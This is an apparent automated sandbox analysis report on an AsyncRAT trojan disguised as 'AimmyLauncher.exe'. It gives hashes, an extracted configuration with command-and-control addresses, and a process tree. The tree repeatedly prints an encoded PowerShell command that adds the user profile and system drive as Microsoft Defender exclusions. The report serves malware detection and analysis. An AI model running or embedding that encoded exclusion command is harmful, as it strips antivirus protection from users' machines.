asyncrat | 21461a755ed10d7a6aeab5d5b540c588573efa81025cdba66dde521d9ac5bb10

Analysis

max time kernel
0s
max time network
85s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
20-04-2024 14:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

AimmyLauncher.exe
Size

230KB
MD5

2b501e81f51f5a18668061b7726710fd
SHA1

5c8fc5ba854ac7c3371f499b70dff8835099ac7c
SHA256

21461a755ed10d7a6aeab5d5b540c588573efa81025cdba66dde521d9ac5bb10
SHA512

5df06b985a91a06c48bd6fcee6abf70512df1e07aa121ebfc87fb3f7d47deae2943bc4bac144e9c54f974cf595cd1ec3d4fc42a7400ef21f0a21a9f2da1423a5
SSDEEP

6144:DiDcXhu+MC+39WNNe2vZlz4GBA0JtXBLLd8WTI8:Dikhu+Mz39WLe2z8GBA0jxd86

Score

10^/10

asyncrat default rat

Malware Config

Extracted

Family

asyncrat

Botnet

Default

127.0.0.1:9511

66.66.146.74:9511

Attributes

delay
1
install
true
install_file
Win32.exe
install_folder
%Temp%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\same.exe	family_asyncrat

Executes dropped EXE 2 IoCs

Processes:

same.exesame.exe

pid process

220 same.exe
3044 same.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
220	same.exe
3044	same.exe

Suspicious use of WriteProcessMemory 19 IoCs

Processes:

AimmyLauncher.exeAimmyLauncher.exeAimmyLauncher.exe

description	pid	process	target process
PID 2428 wrote to memory of 516	2428	AimmyLauncher.exe	powershell.exe
PID 2428 wrote to memory of 516	2428	AimmyLauncher.exe	powershell.exe
PID 2428 wrote to memory of 516	2428	AimmyLauncher.exe	powershell.exe
PID 2428 wrote to memory of 220	2428	AimmyLauncher.exe	same.exe
PID 2428 wrote to memory of 220	2428	AimmyLauncher.exe	same.exe
PID 2428 wrote to memory of 196	2428	AimmyLauncher.exe	AimmyLauncher.exe
PID 2428 wrote to memory of 196	2428	AimmyLauncher.exe	AimmyLauncher.exe
PID 2428 wrote to memory of 196	2428	AimmyLauncher.exe	AimmyLauncher.exe
PID 196 wrote to memory of 788	196	AimmyLauncher.exe	powershell.exe
PID 196 wrote to memory of 788	196	AimmyLauncher.exe	powershell.exe
PID 196 wrote to memory of 788	196	AimmyLauncher.exe	powershell.exe
PID 196 wrote to memory of 3044	196	AimmyLauncher.exe	same.exe
PID 196 wrote to memory of 3044	196	AimmyLauncher.exe	same.exe
PID 196 wrote to memory of 4888	196	AimmyLauncher.exe	AimmyLauncher.exe
PID 196 wrote to memory of 4888	196	AimmyLauncher.exe	AimmyLauncher.exe
PID 196 wrote to memory of 4888	196	AimmyLauncher.exe	AimmyLauncher.exe
PID 4888 wrote to memory of 4900	4888	AimmyLauncher.exe	powershell.exe
PID 4888 wrote to memory of 4900	4888	AimmyLauncher.exe	powershell.exe
PID 4888 wrote to memory of 4900	4888	AimmyLauncher.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2428

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
2⤵
PID:516

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
2⤵
- Executes dropped EXE
PID:220

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:196

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
3⤵
PID:788

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
3⤵
- Executes dropped EXE
PID:3044

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:4888

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
4⤵
PID:4900

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
4⤵
PID:4576

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
4⤵
PID:952

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
5⤵
PID:2392

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
5⤵
PID:592

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
5⤵
PID:4416

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
6⤵
PID:2144

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
6⤵
PID:1852

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
6⤵
PID:3088

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
7⤵
PID:4276

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
7⤵
PID:1812

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
7⤵
PID:2464

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
8⤵
PID:924

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
8⤵
PID:1376

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
8⤵
PID:376

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
9⤵
PID:2260

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
9⤵
PID:3764

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
9⤵
PID:2428

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
10⤵
PID:1276

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
10⤵
PID:3344

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
10⤵
PID:4172

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
11⤵
PID:2960

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
11⤵
PID:4612

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
11⤵
PID:4460

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
12⤵
PID:5020

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
12⤵
PID:4300

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
12⤵
PID:4652

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
13⤵
PID:3348

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
13⤵
PID:4072

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
13⤵
PID:2328

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
14⤵
PID:5380

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
14⤵
PID:5396

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
14⤵
PID:5404

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
15⤵
PID:5792

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
15⤵
PID:5800

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
15⤵
PID:5808

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
16⤵
PID:6092

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
16⤵
PID:6100

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
16⤵
PID:6112

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
17⤵
PID:5260

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
17⤵
PID:2640

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
17⤵
PID:5524

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
18⤵
PID:5428

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
18⤵
PID:3084

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
18⤵
PID:6048

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
19⤵
PID:5156

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
19⤵
PID:2576

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
19⤵
PID:5832

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
20⤵
PID:6040

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
20⤵
PID:5600

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
20⤵
PID:5620

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
21⤵
PID:6252

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
21⤵
PID:6260

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
21⤵
PID:6272

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
22⤵
PID:6972

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
22⤵
PID:6984

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
22⤵
PID:6992

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
23⤵
PID:6680

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
23⤵
PID:6688

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
23⤵
PID:1736

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
24⤵
PID:6548

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
24⤵
PID:6652

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
24⤵
PID:6952

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
25⤵
PID:6348

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
25⤵
PID:5656

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
25⤵
PID:6948

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
26⤵
PID:6816

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
26⤵
PID:6556

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
26⤵
PID:6388

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
27⤵
PID:6944

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
27⤵
PID:6368

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
27⤵
PID:6384

